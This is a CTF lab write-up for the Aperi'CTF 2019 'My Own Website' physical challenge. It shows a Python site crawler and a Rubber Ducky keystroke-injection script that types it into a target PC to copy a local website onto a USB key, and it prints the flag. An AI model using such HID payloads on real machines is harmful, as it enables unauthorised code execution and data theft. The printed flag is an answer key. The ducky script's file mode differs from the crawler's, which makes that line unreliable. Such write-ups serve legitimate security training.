+++
title = "My Own Website"
description = "Aperi'CTF 2019 - Physical (175 pts)"
keywords = "Physical, Rubber, Ducky, HID, Website, WriteUp, CTF, Aperi'CTF, Apéri'CTF, Aperi'CTF, ApériCTF, Aperi'Kube, Apéri'Kube, AperiKube, ApériKube"
date = "2019-09-14T00:00:00+02:00"
weight = 20
draft = false
bref = "Aperi'CTF 2019 - Physical (175 pts)"
toc = true
+++

# Aperi'CTF 2019 - My Own Website

### Challenge details

| Event                    | Challenge      | Category | Points | Solves      |
|--------------------------|----------------|----------|--------|-------------|
| Aperi'CTF 2019           | My Own Website | Physical | 175    | ???         |

L'utilisateur du PC ducky est développeur web à ses heures perdues. Vous devez parser son site web et récupérer les différentes ressources.
L'exfiltration des données peut se faire à l'aide d'une clé USB classique (montage D:// par default) uniquement.
Le flag respecte le format APRK{...}.

### TL;DR
Write a python script to crawl http://127.0.0.1/  and save pages to D://.

### Methodology

Since we have to crawl a website on a computer, we'll try to resolve the website at the URL `http:\\127.0.0.1\`.

To parse the website we'll write a little python script using requests. The script will save each pages on D:\\ and add every new pages in `href` attribute at a crawling list.

Here is the python script:

```python
import requests
import re
urls = ["index.html"]
knowurl = ["index.html"]
s = requests.session()
while len(urls) > 0:
    url = urls.pop()
    r = s.get("http://127.0.0.1/"+url).text
    with open("D:/"+url,"a+") as f:
        f.write(r)
    gurls = re.findall(r'href=[\'"]?([^\'" >]+)', r)
    for u in gurls:
        if u not in knowurl:
            knowurl.append(u)
            urls.append(u)
```

Now, we put it on the Rubber Ducky with ducky code:

```python
DELAY 3000
GUI r
DELAY 1000
STRING python
ENTER
DELAY 2000
STRING import requests
ENTER
STRING import re
ENTER
STRING urls = ["index.html"]
ENTER
STRING knowurl = ["index.html"]
ENTER
STRING s = requests.session()
ENTER
STRING while len(urls) > 0:
ENTER
STRING     url = urls.pop()
ENTER
STRING     r = s.get("http://127.0.0.1/"+url).text
ENTER
STRING     with open("D:/"+url,"wb") as f:
ENTER
STRING         f.write(r)
ENTER
STRING     gurls = re.findall(r'href=[\'"]?([^\'" >]+)', r)
ENTER
STRING     for u in gurls:
ENTER
STRING         if u not in knowurl:
ENTER
STRING             knowurl.append(u)
ENTER
STRING             urls.append(u)
ENTER
ENTER
```

After that, we plug out the two key, we can browse the website stored on the USB key. Open the file named `7cOQ3F2J4S.html`, then read the flag.

Here is the website when css and images are also downloaded:

<center><img src="/img/aperictf_2019/my_own_website/screen.png" alt="screen.png"/></center><br>

#### Flag

`APRK{*We88er!Ducky*}`

[Zeecka](https://twitter.com/Zeecka_)
